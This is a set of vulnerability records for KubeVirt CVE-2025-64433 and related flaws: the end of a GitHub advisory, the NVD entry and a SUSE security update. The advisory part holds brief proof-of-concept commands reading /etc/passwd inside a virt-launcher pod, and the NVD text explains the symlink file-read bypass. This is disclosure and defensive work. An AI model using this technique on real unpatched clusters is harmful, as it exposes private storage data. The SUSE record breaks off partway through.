name=\u0027usb-hub\u0027/\u003e\n \u003cflag name=\u0027ich9-ahci\u0027/\u003e\n```\n\n```bash\noperator@minikube:~$ kubectl get pods\nNAME READY STATUS RESTARTS AGE\ndual-pvc-pod 1/1 Running 0 20m\nvirt-launcher-arbitrary-container-read-tn4mb 3/3 Running 0 15m\n# Inspect the contents of the `/etc/passwd` file of the `virt-launcher` pod attached to the VM\noperator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- cat /etc/passwd\nqemu:x:107:107:user:/home/qemu:/bin/bash\nroot:x:0:0:root:/root:/bin/bash \n\n# Inspect the ownership of the `/etc/passwd` file of the ` virt-launcher` pod \noperator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- ls -al /etc/passwd\n-rw-r--r--. 1 qemu qemu 73 Jan 1 1970 /etc/passwd\n```\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nThis vulnerability breaches the container-to-VM isolation boundary, compromising the confidentiality of storage data.",
"id": "GHSA-qw6q-3pgr-5cwq",
"modified": "2025-11-17T21:41:09Z",
"published": "2025-11-06T23:33:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qw6q-3pgr-5cwq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64433"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/09eafa068ec01eca0e96ebafeeb9522a878dbf64"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/9dc798cb1efe924a9a2b97b6e016452dec5e3849"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/a81b27d4600cf654274dd197119658382affdb08"
},
{
"type": "PACKAGE",
"url": "https://github.com/kubevirt/kubevirt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "KubeVirt Arbitrary Container File Read "
}
FKIE_CVE-2025-64433
Vulnerability from fkie_nvd - Published: 2025-11-07 23:15 - Updated: 2025-11-25 16:49{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*",
"matchCriteriaId": "D06A16D0-A19D-4FC9-BBB2-DD155157AD8E",
"versionEndExcluding": "1.5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:-:*:*:*:kubernetes:*:*",
"matchCriteriaId": "7AC531A2-1D99-4F6E-8C95-57B3B6B15681",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:alpha0:*:*:*:kubernetes:*:*",
"matchCriteriaId": "DD76B774-EB47-4714-8235-D006EC603FDB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:beta0:*:*:*:kubernetes:*:*",
"matchCriteriaId": "849F4551-D37E-40C3-A49D-AF2A9BA9CC8A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:rc0:*:*:*:kubernetes:*:*",
"matchCriteriaId": "3A5C8C2B-705D-435E-93A7-0523DC4A97BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:rc1:*:*:*:kubernetes:*:*",
"matchCriteriaId": "A6326DB3-2CBC-4B85-94C8-9F2B2B458548",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1."
},
{
"lang": "es",
"value": "KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. Versiones anteriores a 1.5.3 y 1.6.1, se descubri\u00f3 una vulnerabilidad que permite a una VM leer archivos arbitrarios del sistema de archivos del pod virt-launcher. Este problema se deriva del manejo inadecuado de enlaces simb\u00f3licos al montar discos PVC en una VM. Espec\u00edficamente, si un usuario malicioso tiene control total o parcial sobre el contenido de un PVC, puede crear un enlace simb\u00f3lico que apunte a un archivo dentro del sistema de archivos del pod virt-launcher. Dado que libvirt puede tratar archivos regulares como dispositivos de bloque, cualquier archivo en el sistema de archivos del pod que est\u00e9 enlazado simb\u00f3licamente de esta manera puede montarse en la VM y, posteriormente, leerse. Aunque existe un mecanismo de seguridad donde las VMs se ejecutan como un usuario sin privilegios con UID 107 dentro del contenedor virt-launcher, lo que limita el alcance de los recursos accesibles, esta restricci\u00f3n se elude debido a una segunda vulnerabilidad. Esta \u00faltima provoca que la propiedad de cualquier archivo destinado a ser montado se cambie al usuario sin privilegios con UID 107 antes del montaje. Como resultado, un atacante puede obtener acceso y leer archivos arbitrarios ubicados dentro del sistema de archivos del pod virt-launcher o en un PVC montado desde dentro de la VM invitada. Esta vulnerabilidad est\u00e1 corregida en las versiones 1.5.3 y 1.6.1."
}
],
"id": "CVE-2025-64433",
"lastModified": "2025-11-25T16:49:00.340",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-11-07T23:15:45.537",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/09eafa068ec01eca0e96ebafeeb9522a878dbf64"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/9dc798cb1efe924a9a2b97b6e016452dec5e3849"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/a81b27d4600cf654274dd197119658382affdb08"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qw6q-3pgr-5cwq"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
SUSE-SU-2025:4330-1
Vulnerability from csaf_suse - Published: 2025-12-09 11:33 - Updated: 2025-12-09 11:33Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container fixes the following issues:\n\nUpdated kubevirt to version 1.6.3:\n\n - CVE-2025-22872: Fixed incorrect interpretation of tags leading content to be placed wrong scope during DOM \n construction in golang.org/x/net/html (bsc#1241772)\n - CVE-2025-64432: Fixed bypass of RBAC controls due to incorrect validation of certain fields in the client\n TLS certificate (bsc#1253181)\n - CVE-2025-64433: Fixed arbitrary files read via improper symlink handling (bsc#1253185)\n - CVE-2025-64434: Fixed privilege escalation via virt-api impersonification due to compromise virt-handler\n instance (bsc#1253186)\n - CVE-2025-64437: Fixed mishandling of symlinks (bsc#1253194)\n - CVE-2025-64324: Fixed a logic bug that allows an attacker to read and write arbitrary files owned by more\n privileged users (bsc#1253748)\n\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-4330,SUSE-SLE-Module-Containers-15-SP7-2025-4330",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_4330-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:4330-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-20254330-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:4330-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2025-December/023449.html"
},
{
"category": "self",
"summary": "SUSE Bug 1241772",
"url": "https://bugzilla.suse.com/1241772"
},
{
"category": "self",
"summary": "SUSE Bug 1250683",
"url": "https://bugzilla.suse.com/1250683"
},
{
"category": "self",
"summary": "SUSE Bug 1253181",
"url": "https://bugzilla.suse.com/1253181"
},
{
"category": "self",
"summary": "SUSE Bug 1253185",
"url": "https://bugzilla.suse.com/1253185"
},
{
"category": "self",
"summary": "SUSE Bug 1253186",
"url": "https://bugzilla.suse.com/1253186"
},
{
"category": "self",
"summary": "SUSE Bug 1253194",
"url": "https://bugzilla.suse.com/1253194"
},
{
"category": "self",
"summary": "SUSE Bug 1253384",
"url": "https://bugzilla.suse.com/1253384"
},
{
"category": "self",
"summary": "SUSE Bug 1253748",
"url": "https://bugzilla.suse.com/1253748"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64432 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64432/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64434 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64434/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container",
"tracking": {
"current_release_date": "2025-12-09T11:33:55Z",
"generator": {
"date": "2025-12-09T11:33:55Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:4330-1",
"initial_release_date": "2025-12-09T11:33:55Z",
"revision_history": [
{
"date": "2025-12-09T11:33:55Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-containers:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64"
},
"product_reference": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64"
},
"product_reference": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64"
},
"product_reference": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64324"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64324",
"url": "https://www.suse.com/security/cve/CVE-2025-64324"
},
{
"category": "external",
"summary": "SUSE Bug 1253748 for CVE-2025-64324",
"url": "https://bugzilla.suse.com/1253748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "important"
}
],
"title": "CVE-2025-64324"
},
{
"cve": "CVE-2025-64432",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64432"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64432",
"url": "https://www.suse.com/security/cve/CVE-2025-64432"
},
{
"category": "external",
"summary": "SUSE Bug 1253181 for CVE-2025-64432",
"url": "https://bugzilla.suse.com/1253181"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
